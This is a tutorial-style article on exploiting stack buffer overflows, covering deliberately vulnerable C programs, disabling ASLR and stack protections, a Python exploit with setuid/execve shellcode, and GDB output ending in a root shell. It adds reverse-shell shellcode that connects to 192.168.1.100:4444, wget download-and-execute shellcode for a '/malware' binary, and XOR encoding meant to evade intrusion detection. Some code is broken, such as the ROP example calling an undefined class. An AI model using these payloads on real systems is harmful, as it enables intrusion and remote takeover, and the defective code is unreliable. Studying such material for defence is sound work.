Buffer Overflow Vulnerability Deep Dive (Part 1): From Principles to Practical Exploitation

Buffer Overflow Fundamentals

What is a Buffer Overflow

A buffer overflow is a common software security vulnerability that occurs when a program writes data to a fixed-size buffer that exceeds its capacity. This vulnerability can lead to:

Memory Corruption: Overwriting adjacent memory regions
Program Crash: Disrupting the normal execution flow of the program
Code Execution: Attackers may gain control of the program

Memory Layout in C

In a C program, memory is typically divided into the following regions:

bash
High Address
+------------------+
|       Stack      |  ← Function calls, local variables
|       ↓          |
+------------------+
|       ...        |
+------------------+
|       ↑          |
|      Heap        |  ← Dynamically allocated memory
+------------------+
|BSS(Uninitialized)|
+------------------+
| Data(Initialized)|
+------------------+
|     Code Segment |
+------------------+
Low Address

Stack Frame Structure

Each function call creates a stack frame on the stack:

bash
High Address
+--------------------+
| Function Arguments |
+--------------------+
|     Return Address |  ← Key attack target
+--------------------+
|      Saved EBP     |
+--------------------+
| Local Variables    |  ← Buffer location
+--------------------+
Low Address

When a buffer overflow occurs, data may overwrite the return address, thereby controlling the program's execution flow.

Vulnerable Code Analysis

Target Program Code

c
#include <stdio.h>
#include <string.h>

int copy(char *str) {
    char buffer[100];        // 100-byte local buffer
    // unsafe!
    strcpy(buffer, str);     // Dangerous string copy operation
    return 0;               // Added return value
}

int main(int argc, char *argv[]) {
    copy(argv[1]);          // Pass command-line argument to copy function
    return 0;
}

Vulnerability Analysis

This simple C program contains a typical buffer overflow vulnerability:

Vulnerability: The strcpy(buffer, str) function does not check the length of the source string
Buffer Size: The buffer array is only 100 bytes
Attack Vector: If argv[1] exceeds 100 bytes, an overflow will occur
Impact: The overflowing data will overwrite other data on the stack, including the return address

Memory Layout Analysis

When the copy function is called, the stack layout is roughly as follows:

bash
High Address
+--------------------+
|    argv[1] pointer |  ← Argument of main function
+--------------------+
|copy Return Address |  ← Attack target!
+--------------------+
|      Saved EBP     |
+--------------------+
|   buffer[99]       |
|   buffer[98]       |
|      ...           |  ← 100-byte buffer
|   buffer[1]        |
|   buffer[0]        |  ← ESP points nearby
+--------------------+
Low Address

When the input data exceeds 100 bytes, the excess data will overwrite the saved EBP and the return address.

Extended Vulnerability Examples

To better understand the diversity of buffer overflows, let's look at a few other types of original vulnerability examples. These examples have similar attack patterns to real-world CVE vulnerabilities:

Example 2: User Authentication System Vulnerability (Similar to CVE-2024-28219 Pattern)

c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

typedef struct {
    char username[32];
    char password[32]; 
    int is_admin;
} UserCredentials;

int authenticate_user(const char* user_input, const char* pass_input) {
    UserCredentials creds;
    creds.is_admin = 0;  // Default non-administrator privileges
    
    // Dangerous string copy - may overflow and overwrite the is_admin field
    strcpy(creds.username, user_input);
    strcpy(creds.password, pass_input);
    
    printf("Username: %s\n", creds.username);
    printf("Administrator privileges: %s\n", creds.is_admin ? "Yes" : "No");
    
    return creds.is_admin;
}

int main(int argc, char *argv[]) {
    if (argc != 3) {
        printf("Usage: %s <username> <password>\n", argv[0]);
        return 1;
    }
    
    if (authenticate_user(argv[1], argv[2])) {
        printf("🔓 Administrator privileges obtained!\n");
        system("/bin/sh");
    } else {
        printf("❌ Authentication failed\n");
    }
    
    return 0;
}

Vulnerability Analysis:

Structure Layout: The username and password fields are adjacent to the is_admin field
Overflow Point: An overly long username can overwrite the is_admin field, similar to the missing strcpy boundary check in CVE-2024-28219
Attack Effect: Overwrites is_admin from 0 to a non-zero value, gaining administrator privileges
Real-world Correspondence: This type of vulnerability is common in authentication systems, where attackers modify key flag bits by precisely controlling input length

Example 3: Network Data Handling Vulnerability (Similar to CVE-2023-6549 Pattern)

c
#include <stdio.h>
#include <string.h>
#include <stdint.h>

typedef struct {
    uint32_t packet_length;
    char data_buffer[256];
    void (*process_callback)(char*);
} NetworkPacket;

void safe_handler(char* data) {
    printf("Safe handling: %s\n", data);
}

void dangerous_handler(char* data) {
    printf("🚨 Dangerous handler function called!\n");
    system(data);
}

int process_network_data(const char* raw_data, uint32_t length) {
    NetworkPacket packet;
    packet.process_callback = safe_handler;  // Default safe handler function
    
    printf("Processing a packet of length %u\n", length);
    
    // Potential integer overflow and buffer overflow
    if (length > 0 && length < 512) {  // Seemingly safe check
        memcpy(packet.data_buffer, raw_data, length);
        packet.process_callback(packet.data_buffer);
    }
    
    return 0;
}

int main(int argc, char *argv[]) {
    if (argc != 2) {
        printf("Usage: %s <data>\n", argv[0]);
        return 1;
    }
    
    uint32_t data_len = strlen(argv[1]);
    process_network_data(argv[1], data_len);
    
    return 0;
}

Vulnerability Analysis:

Function Pointer Overwrite: Overly long data can overwrite the process_callback function pointer
Length Check Bypass: Unsigned integer comparison can be bypassed, similar to integer underflow in CVE-2022-0185
Attack Vector: Carefully constructed input can point the function pointer to dangerous_handler
Real-world Correspondence: This pattern is common in network protocol handling; CVE-2023-6549 triggered a buffer overflow in NetScaler through a similar method

Compilation Settings and Environment Preparation

Compilation Parameter Analysis

bash

# Compile the vulnerable program
gcc -m32 -std=c99 -g -fno-stack-protector -z execstack -no-pie -o vul vul.c

The role of each compilation parameter:

-m32: Generate a 32-bit executable file, simplifying memory address calculations
-std=c99: Compile using the C99 standard
-g: Include debugging information for easier debugging with GDB
-fno-stack-protector: Disable stack protection mechanism (canary)
-z execstack: Allow the stack area to be executable, allowing shellcode to run
-no-pie: Disable position-independent executable files, fixing the program loading address

System Security Mechanism Configuration

bash
# Disable Address Space Layout Randomization (ASLR)
root@softsec2:/home/toor/sample# echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
0

ASLR (Address Space Layout Randomization):

Normally, memory addresses are randomized each time a program runs
Disabling ASLR makes stack addresses, heap addresses, and library addresses predictable
This allows attackers to accurately calculate jump addresses

Vulnerability Exploitation Process

Step 1: Determine the Overflow Point

python
#!/usr/bin/python3
# exploit_step1.py - Test basic overflow
import sys

# Send 112 'A' characters + 4 'B' characters
# 112 bytes fill the buffer, 4 bytes overwrite the return address
sys.stdout.buffer.write(b'A' * 112 + b'B' * 4)

Principle Analysis:

112 'A's: Fill the 100-byte buffer + 12 bytes of padding (alignment and saved EBP)
4 'B's: Overwrite the 4-byte return address
When the program attempts to return, it will jump to address 0x42424242 ('BBBB' in hexadecimal)

Test Run Results

bash
# Generate attack payload
python3 exploit_step1.py > payload1

# Run test
./vul $(cat payload1)

If successful, the program will crash because it attempts to jump to the invalid address 0x42424242, proving that we have controlled the program's execution flow.

bash
(gdb) list
warning: Source file is more recent than executable.
1       #include <stdio.h>
2       #include <string.h>
3       int copy(char *str) {
4           char buffer[100];
5           // unsafe!
6           strcpy(buffer, str);
7       }
8       int main(int argc, char *argv[]) {
9           copy(argv[1]);
10          return 0;
(gdb) b 6
Breakpoint 1 at 0x8049187: file vul.c, line 6.
(gdb) run $(cat out_boom)
Starting program: /home/toor/sample/vul $(cat out_boom)
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Breakpoint 1, copy (str=0xffffdf42 'A' <repeats 112 times>, "BBBB") at vul.c:6
6           strcpy(buffer, str);
(gdb) n
7       }
(gdb) x/x $esp
0xffffdcd0:     0xf7ffd000
(gdb) x/40x $esp
0xffffdcd0:     0xf7ffd000      0x00000020      0x00000000      0x41414141
0xffffdce0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffffdcf0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffffdd00:     0x41414141      0x41414141      0x41414141      0x41414141
0xffffdd10:     0x41414141      0x41414141      0x41414141      0x41414141
0xffffdd20:     0x41414141      0x41414141      0x41414141      0x41414141
0xffffdd30:     0x41414141      0x41414141      0x41414141      0x41414141
0xffffdd40:     0x41414141      0x41414141      0x41414141      0x42424242
0xffffdd50:     0xffffdf00      0xf7fbe66c      0xf7fbeb10      0x080491b7
0xffffdd60:     0x00000001      0xffffdd80      0xf7ffd020      0xf7da7519
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()

Step 1 Test Success Analysis:

Input Data Confirmation: GDB shows that the string passed in is 112 'A' characters plus 4 'B' characters
Memory Overwrite Verification:
- 0xffffdcd0 - 0xffffdd40: A large number of 0x41414141 ('AAAA') fills the buffer and adjacent memory
- 0xffffdd40: The last 4 bytes are overwritten by 0x42424242 ('BBBB'), which is the location of the function's return address
Attack Effect Confirmation:
- The program attempts to return to address 0x42424242, which is not a valid memory address
- The system generates a segmentation fault (SIGSEGV), and the program crashes
- This proves that we have successfully controlled the program's execution flow

This test confirms:

The exact location of the overflow point: 112 bytes of padding + 4 bytes of return address overwrite
We can precisely control the value of the EIP register
Next, we can replace 0x42424242 with the actual address pointing to the shellcode

Step 2: Constructing the Attack Payload

NOP Sled Technique

NOP (No Operation) is an assembly instruction (machine code: \x90), which does nothing when executed, only incrementing the program counter. A NOP sled is a technique to improve the success rate of an attack:

python
#!/usr/bin/python3
# exploit_final.py - Complete attack payload
import sys

# NOP sled: 64 bytes of NOP instructions
# Function: Even if the jump address is not accurate enough, it can "slide" to the shellcode
nopsled = b'\x90' * 64

# Shellcode: Obtain root privileges and execute shell
shellcode = (
    b'\x31\xc0\x89\xc3\xb0\x17\xcd\x80' +   # setuid(0) system call
    b'\x31\xd2\x52\x68\x6e\x2f\x73\x68' +   # Construct "/bin/sh" string
    b'\x68\x2f\x2f\x62\x69\x89\xe3\x52' +   # Continue constructing the string
    b'\x53\x89\xe1\x8d\x42\x0b\xcd\x80'     # execve("/bin/sh") system call
)

# Calculate the number of padding bytes: Total length 112 - NOP sled 64 - shellcode length 32 = 16
padding = b'A' * (112 - 64 - 32)

# Return address: Jump to a certain location in the NOP sled area
eip = b"\xF0\xDC\xFF\xFF"  # An address on the stack

# Assemble the final payload: NOP sled + shellcode + padding + return address
sys.stdout.buffer.write(nopsled + shellcode + padding + eip)

Shellcode Analysis

This shellcode's function is to obtain root privileges and start a shell:

setuid(0): Sets the user ID of the current process to 0 (root)
String Construction: Constructs the "/bin/sh" string on the stack
execve("/bin/sh"): Executes the shell program

Machine Code Analysis:

\x31\xc0: xor eax, eax - Clears EAX
\x89\xc3: mov ebx, eax - Sets EBX to 0
\xb0\x17: mov al, 0x17 - setuid system call number (23)
\xcd\x80: int 0x80 - Triggers the system call

Extended Shellcode Analysis

In addition to the basic shellcode that starts a shell, attackers may also use other types of payloads. Here are some common shellcode variations:

Reverse Connection Shellcode

This shellcode establishes a connection to a server controlled by the attacker:

python
# Reverse connection shellcode (connects to 192.168.1.100:4444)
reverse_shell = (
    b'\x31\xc0\x31\xdb\x31\xc9\x31\xd2' +   # Clear registers
    b'\xb0\x66\xb3\x01\x51\x53\x6a\x02' +   # socket(AF_INET, SOCK_STREAM, 0)
    b'\x89\xe1\xcd\x80\x89\xc6\xb0\x66' +   # Call system call, save socket fd
    b'\xb3\x03\x68\x64\x01\xa8\xc0\x66' +   # Construct sockaddr structure (IP: 192.168.1.100)
    b'\x68\x11\x5c\x66\x53\x89\xe1\x6a' +   # Port 4444, AF_INET
    b'\x10\x51\x56\x89\xe1\xcd\x80\x31' +   # connect() system call
    b'\xc9\xb1\x03\xb0\x3f\x49\x89\xf3' +   # Loop dup2() redirect stdin/stdout/stderr
    b'\xcd\x80\x75\xf8\x31\xc0\x50\x68' +   # 
    b'\x2f\x2f\x73\x68\x68\x2f\x62\x69' +   # Construct "/bin/sh" string
    b'\x89\xe3\x50\x53\x89\xe1\xb0\x0b' +   # execve("/bin/sh")
    b'\xcd\x80'                             # Execute shell
)

Reverse Connection Shellcode Analysis:

Create Socket: Uses the socket() system call to create a TCP connection
Connect to Attacker: Connects to the specified IP address and port
Redirect IO: Redirects stdin/stdout/stderr to the socket
Execute Shell: Starts the shell, enabling remote control

Download and Execute Shellcode

This shellcode downloads and executes a file from a remote server:

python
# Download and execute shellcode example
download_exec = (
    b'\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68' +   # execve preparation
    b'\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x2d\x63' +   # "/bin/sh", "-c" parameter
    b'\x00\x00\x89\xe6\x52\x68\x67\x65\x74\x20\x68' +   # "wget " command
    b'\x77\x67\x65\x74\x20\x89\xe7\x52\x68\x74\x70' +   # Construct wget command
    b'\x3a\x2f\x2f\x68\x68\x74\x74\x70\x3a\x2f\x2f' +   # "http://"
    b'\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x2e\x31' +   # IP address string
    b'\x30\x30\x2f\x6d\x61\x6c\x77\x61\x72\x65\x20' +   # "/malware "
    b'\x26\x26\x20\x63\x68\x6d\x6f\x64\x20\x2b\x78' +   # "&& chmod +x"
    b'\x20\x6d\x61\x6c\x77\x61\x72\x65\x20\x26\x26' +   # " malware &&"
    b'\x20\x2e\x2f\x6d\x61\x6c\x77\x61\x72\x65'        # " ./malware"
)

Fileless Attack Shellcode

Executes code directly in memory, leaving no file traces:

c
// Memory execution shellcode framework
char memory_exec_template[] = 
    // Allocate executable memory
    "\x31\xc0\x31\xdb\x31\xc9\x31\xd2"     // Clear registers
    "\xb8\x7d\x00\x00\x00"                 // mmap system call number
    "\x31\xdb"                             // addr = NULL
    "\xb9\x00\x10\x00\x00"                 // length = 4096
    "\xba\x07\x00\x00\x00"                 // prot = PROT_READ|WRITE|EXEC
    "\xbe\x22\x00\x00\x00"                 // flags = MAP_PRIVATE|ANONYMOUS
    "\xbf\xff\xff\xff\xff"                 // fd = -1
    "\x31\xed"                             // offset = 0
    "\xcd\x80"                             // int 0x80
    
    // Copy subsequent code to newly allocated memory
    "\x89\xc3"                             // Save the address returned by mmap
    "\x31\xc9"                             // Clear counter
    "\xeb\x0c"                             // Jump to payload
    
    // Insert actual payload code here...
    ;

Shellcode Encoding Techniques

To bypass intrusion detection systems, shellcode usually needs to be encoded:

python
def xor_encode_shellcode(shellcode, key=0xAA):
    """Simple XOR encoding example"""
    encoded = bytearray()
    for byte in shellcode:
        encoded.append(byte ^ key)
    
    # Add decoding stub
    decoder_stub = (
        b'\xeb\x11'                    # jmp short 0x13 (jump over encoded data)
        b'\x5e'                        # pop esi (get shellcode address)
        b'\x31\xc9'                    # xor ecx, ecx (clear counter)
        b'\xb1' + bytes([len(encoded)]) # mov cl, <length>
        b'\x80\x36' + bytes([key])     # xor byte ptr [esi], <key>
        b'\x46'                        # inc esi
        b'\xe2\xfb'                    # loop decoding loop
        b'\xeb\x05'                    # jmp short +5 (jump to decoded shellcode)
        b'\xe8\xea\xff\xff\xff'       # call back to decoder
    )
    
    return decoder_stub + encoded

# Usage example
original_shellcode = b'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80'
encoded = xor_encode_shellcode(original_shellcode)

Shellcode Detection and Protection

Understanding how shellcode works helps implement effective protection measures:

Feature Detection

python
def detect_shellcode_patterns(data):
    """Detect common shellcode patterns"""
    suspicious_patterns = [
        b'\x31\xc0',          # xor eax, eax
        b'\xcd\x80',          # int 0x80
        b'\x2f\x62\x69\x6e', # "/bin"
        b'\x2f\x73\x68',      # "/sh"
        b'\x90' * 10,         # NOP sled
    ]
    
    detections = []
    for pattern in suspicious_patterns:
        if pattern in data:
            detections.append(f"Detected suspicious pattern: {pattern.hex()}")
    
    return detections

GDB Debugging Analysis

Setting Breakpoints and Running

bash

(gdb) list
warning: Source file is more recent than executable.
1       #include <stdio.h>
2       #include <string.h>
3       int copy(char *str) {
4           char buffer[100];
5           // unsafe!
6           strcpy(buffer, str);
7       }
8       int main(int argc, char *argv[]) {
9           copy(argv[1]);
10          return 0;

# Set breakpoint at strcpy function
(gdb) b 6
Breakpoint 1 at 0x8049187: file vul.c, line 6.

# Run the program with the attack payload
(gdb) run $(python3 exploit_final.py)
Starting program: /home/toor/sample/vul $(python3 exploit_final.py)
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Breakpoint 1, copy (str=0xffffdf42 '\220' <repeats 64 times>, "\061\300\211\303\260\027\315\200\061\322Rhn/shh//bi\211\343RS\211\341\215B\v\315\200", 'A' <repeats 16 times>, "\360\334\377\377") at vul.c:6
6           strcpy(buffer, str);

# Execute strcpy operation
(gdb) n
7       }

**Debugging Information Interpretation**:
- GDB shows the content of the string passed in, showing the NOP sled (`\220` repeated 64 times)
- Then comes the machine code of the shellcode
- Then comes the padding character 'A' (16)
- Finally, the return address `\360\334\377\377`

### Memory State Analysis

```bash
# Check stack pointer location
(gdb) x/x $esp      
0xffffdcd0:     0xf7ffd000

# View 40 32-bit words (160 bytes) on the stack
(gdb) x/40x $esp
0xffffdcd0:     0xf7ffd000      0x00000020      0x00000000      0x90909090
0xffffdce0:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffdcf0:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffdd00:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffdd10:     0x90909090      0x90909090      0x90909090      0xc389c031
0xffffdd20:     0x80cd17b0      0x6852d231      0x68732f6e      0x622f2f68
0xffffdd30:     0x52e38969      0x8de18953      0x80cd0b42      0x41414141
0xffffdd40:     0x41414141      0x41414141      0x41414141      0xffffdcf0
0xffffdd50:     0xffffdf00      0xf7fbe66c      0xf7fbeb10      0x080491b7
0xffffdd60:     0x00000001      0xffffdd80      0xf7ffd020      0xf7da7519

Memory Analysis Details:

NOP Sled Area (0xffffdcd0 - 0xffffdd18):
- A large number of 0x90909090 represents NOP instructions
- This provides a large target area for the attack
Shellcode Area (0xffffdd18 - 0xffffdd38):
- 0xc389c031: Beginning of shellcode (xor eax,eax; mov ebx,eax)
- 0x80cd17b0: mov al,0x17; int 0x80 (setuid system call)
- 0x6852d231 - 0x80cd0b42: execve system call related code
Padding Area (0xffffdd38 - 0xffffdd48):
- 0x41414141: Padding character 'A'
Return Address Overwrite (0xffffdd48):
- 0xffffdcf0: This is the return address we set, pointing to the NOP sled area

Executing the Attack Payload

bash
# Continue executing the program
(gdb) c
Continuing.

# The program successfully executes the shellcode, starting a new shell
process 10920 is executing new program: /usr/bin/dash
Error in re-setting breakpoint 1: No source file named /home/toor/sample/vul.c.
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

# Test privileges - successfully obtained root privileges!
# whoami
[Detaching after vfork from child process 10982]
root

Attack Success Analysis:

When the program returns from the copy function, it jumps to the address we set, 0xffffdcf0
This address points to the NOP sled area, and the processor executes a series of NOP instructions
After "sliding" to the shellcode area, our malicious code begins to execute
The shellcode successfully calls setuid(0) and execve("/bin/sh")
Finally, a shell with root privileges is obtained

Extended Exploitation Techniques

Besides basic stack overflow exploitation, several advanced attack techniques are worth studying:

ROP (Return-Oriented Programming) Attack

When the stack is non-executable, the ROP technique can be used to link existing code snippets:

python
#!/usr/bin/python3
# rop_exploit.py - ROP chain attack example

import struct

class ROPGadget:
    """ROP gadget management class"""
    def __init__(self):
        # Useful gadgets found in the program or library
        self.gadgets = {
            'pop_eax_ret': 0x080483d1,      # pop eax; ret
            'pop_ebx_ret': 0x080483d2,      # pop ebx; ret  
            'pop_ecx_ret': 0x080483d3,      # pop ecx; ret
            'pop_edx_ret': 0x080483d4,      # pop edx; ret
            'int_0x80': 0x080483d5,         # int 0x80; ret
            'xor_eax_ret': 0x080483d6,      # xor eax, eax; ret
            'bin_sh_addr': 0x080484a0,      # "/bin/sh" string address
        }
    
    def build_payload(self):
        """Construct ret2libc attack payload"""
        addrs = self.calculate_addresses()
        
        # Buffer padding
        padding = b'A' * 112
        
        # Construct call chain: system("/bin/sh"); exit(0);
        payload = padding
        payload += struct.pack('<I', addrs['system'])   # Return to system()
        payload += struct.pack('<I', addrs['exit'])     # Call exit() after system returns
        payload += struct.pack('<I', addrs['bin_sh'])   # Parameter "/bin/sh" for system()
        
        return payload

# Address leakage helper function
def leak_libc_address():
    """
    In actual attacks, libc address needs to be leaked first
    This is for demonstration purposes only
    """
    # Example: Leak address through format string vulnerability
    format_string_payload = b"AAAA" + b"%p " * 20
    return format_string_payload

# Usage example
exploit = Ret2LibcExploit()
payload = exploit.build_payload()

print(f"ret2libc payload length: {len(payload)} bytes")
sys.stdout.buffer.write(payload)

Heap Overflow Exploitation Example

Basic concepts of heap overflow attacks:

python
#!/usr/bin/python3
# heap_overflow_demo.py - Heap overflow concept demonstration

class HeapChunk:
    """Simulate heap chunk structure"""
    def __init__(self, size, data=b''):
        self.size = size
        self.prev_size = 0
        self.flags = 0
        self.data = data[:size-8]  # Subtract header 8 bytes
        self.fd = 0    # forward pointer
        self.bk = 0    # backward pointer
    
    def __repr__(self):
        return f"Chunk(size={self.size}, data={self.data[:20]}...)"

class HeapManager:
    """Simplified heap manager"""
    def __init__(self):
        self.chunks = []
        self.free_list = []
    
    def malloc(self, size):
        """Allocate memory block"""
        # 8-byte alignment
        aligned_size = (size + 7) & ~7
        chunk = HeapChunk(aligned_size + 8)  # Add header
        self.chunks.append(chunk)
        return len(self.chunks) - 1  # Return block index
    
    def free(self, chunk_id):
        """Free memory block"""
        if 0 <= chunk_id < len(self.chunks):
            chunk = self.chunks[chunk_id]
            self.free_list.append(chunk_id)
            print(f"Free block {chunk_id}: {chunk}")
    
    def write_data(self, chunk_id, data):
        """Write data to block"""
        if 0 <= chunk_id < len(self.chunks):
            chunk = self.chunks[chunk_id]
            if len(data) <= len(chunk.data):
                chunk.data = data
                print(f"Safe write to block {chunk_id}")
            else:
                # Overflow situation
                chunk.data = data  # This will overflow to adjacent blocks
                print(f"⚠️ Block {chunk_id} overflow!")
                self.check_corruption()
    
    def check_corruption(self):
        """Check heap corruption"""
        for i, chunk in enumerate(self.chunks):
            if len(chunk.data) > chunk.size - 8:
                print(f"🚨 Detected block {i} data overflow")
                if i + 1 < len(self.chunks):
                    next_chunk = self.chunks[i + 1]
                    print(f"   May affect block {i+1}: {next_chunk}")

# Heap overflow demonstration
def heap_overflow_demo():
    """Demonstrate heap overflow attack"""
    heap = HeapManager()
    
    # Allocate two adjacent blocks
    chunk1 = heap.malloc(32)
    chunk2 = heap.malloc(32)
    
    print(f"Allocated block1 (ID: {chunk1})")
    print(f"Allocated block2 (ID: {chunk2})")
    
    # Normal write
    heap.write_data(chunk1, b"Normal data")
    heap.write_data(chunk2, b"Another block")
    
    print("\n--- Heap Overflow Attack ---")
    # Overflow write, overwrite next block
    overflow_data = b"A" * 50 + b"OVERFLOW_DATA"
    heap.write_data(chunk1, overflow_data)

if __name__ == "__main__":
    heap_overflow_demo()

Format String Attack

Exploiting format string vulnerabilities in printf-like functions:

python
#!/usr/bin/python3
# format_string_exploit.py - Format string attack

def generate_format_string_payload(target_addr, value):
    """
    Generate format string attack payload
    Modify the value at target_addr to value
    """
    # Decompose target address into 4 bytes
    addr_bytes = [
        target_addr & 0xff,
        (target_addr >> 8) & 0xff, 
        (target_addr >> 16) & 0xff,
        (target_addr >> 24) & 0xff
    ]
    
    # Construct payload
    payload = b""
    
    # Place target address 
    for i in range(4):
        payload += (target_addr + i).to_bytes(4, 'little')
    
    # Construct format string
    # This is a simplified example, actual situation needs adjustment based on stack offset
    format_str = "AAAA"
    
    # Use %hhn to write single byte values
    for i, byte_val in enumerate(value.to_bytes(4, 'little')):
        if byte_val == 0:
            format_str += f"%{8+i}$hhn"
        else:
            # Calculate required padding
            format_str += f"%{byte_val-4}c%{8+i}$hhn"
    
    return payload + format_str.encode()

def demo_format_vulnerability():
    """Demonstrate format string vulnerability"""
    print("=== Format String Vulnerability Demo ===")
    
    # Simulate vulnerable C code:
    # char buffer[100];
    # gets(buffer);
    # printf(buffer);  // Dangerous! User input directly as format string
    
    # Information leak payload
    leak_payload = b"AAAA" + b"%p " * 10
    print(f"Information leak payload: {leak_payload}")
    
    # Address write payload
    target_addr = 0x08049680  # Assumed target address
    new_value = 0x41414141    # Value to write
    
    write_payload = generate_format_string_payload(target_addr, new_value)
    print(f"Address write payload length: {len(write_payload)} bytes")
    
    return write_payload

if __name__ == "__main__":
    demo_format_vulnerability()

Summary and Next Article Preview

In this article, we have deeply explored the fundamental principles and practical exploitation techniques of buffer overflow vulnerabilities:

Key Points Review

Basic Principles: In-depth understanding of stack memory layout, function call mechanisms, and stack frame structures
Vulnerability Analysis: Analysis of buffer overflow causes and impacts through specific C code examples
Practical Exploitation:
- Learned how to determine overflow points and construct attack payloads
- Mastered NOP sled techniques and shellcode construction methods
- Understood various attack techniques: ROP, ret2libc, heap overflow, etc.
Debugging Techniques: Using GDB for memory state analysis and vulnerability verification
Advanced Attacks: Format string attacks, reverse connection shellcode, and other extended techniques

Practical Skills Gained

Through this article's study, readers should master:

Identifying potential buffer overflow vulnerabilities in C/C++ code
Using debugging tools to analyze memory layout and execution flow
Constructing basic buffer overflow attack payloads
Understanding the evolution process of modern attack techniques

Next Article Preview: Modern Protection and Real-World Cases

In the next article, we will explore in depth:

Modern Protection Mechanisms

CISA security guidance and enterprise-level protection practices
Stack protection, ASLR, DEP and other protection technologies and their bypass methods
Secure programming practices and code audit techniques

Real CVE Vulnerability Cases

CVE-2024-38812 (VMware vCenter Server heap overflow)
CVE-2022-0185 (Linux kernel privilege escalation)
CVE-2023-6549 (Citrix NetScaler DoS)
CVE-2024-28219 (Pillow library strcpy overflow)

Vulnerability Detection and Emergency Response

Automated vulnerability scanning and code audit tools
Enterprise emergency response processes and best practices
Continuous security monitoring and threat intelligence integration

Modern Language Security Comparison

How Go language avoids buffer overflow from the design level
Memory-safe programming language feature analysis

The next article will combine real CVE cases to demonstrate the actual threats of buffer overflow vulnerabilities in modern environments and provide comprehensive protection strategies. Stay tuned!